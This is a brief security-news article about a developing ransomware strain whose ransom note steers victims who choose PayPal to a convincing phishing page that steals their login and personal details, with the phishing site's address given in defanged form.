Ransomware is usually after one thing only, and that’s encrypting the victim’s data and extorting payment for its decryption. However, a new piece of ransomware which is still in a development stage adds something else to its malicious activity – a PayPal phishing page.
The ransomware in question is not only attempting to encrypt the user’s data but also to harvest their PayPal credentials.
Ransomware Utilizes Phishing Technique
The ransomware, which was discovered by MalwareHunterTeam, is not an advanced piece but it does include a cleverly created ransom note. The ransom note gives the victim the option to choose their payment method – through a Bitcoin address and via PayPal. This may have been done to make the payment method look easier to users who are not familiar with Bitcoin.
As it turns out, choosing PayPal is not a good idea as the victim is taken to a phishing page smartly crafted to steal PayPal’s login credentials:
As you can see, the phishing page is quite convincing and it resembles PayPal quite a lot. However, a closer look shows that any submitted information won’t be sent to the official website of the service but to https://ppyc-ve0rf(.)890m(.)com/s2(.)php. The phishing page also shows another form that is attempting to steal other personal details from the unsuspecting victim.
Interestingly, once all the necessary info has been shared with the phishers, the phishing page says that the account has been unlocked and redirects the victim to the actual PayPal login page.
This is yet another example of cybercriminals getting smarter in their ways to trick victims into revealing personal information, while also encrypting all of their files. Perhaps we will witness more innovative approaches to the well-known ransomware threat in 2019.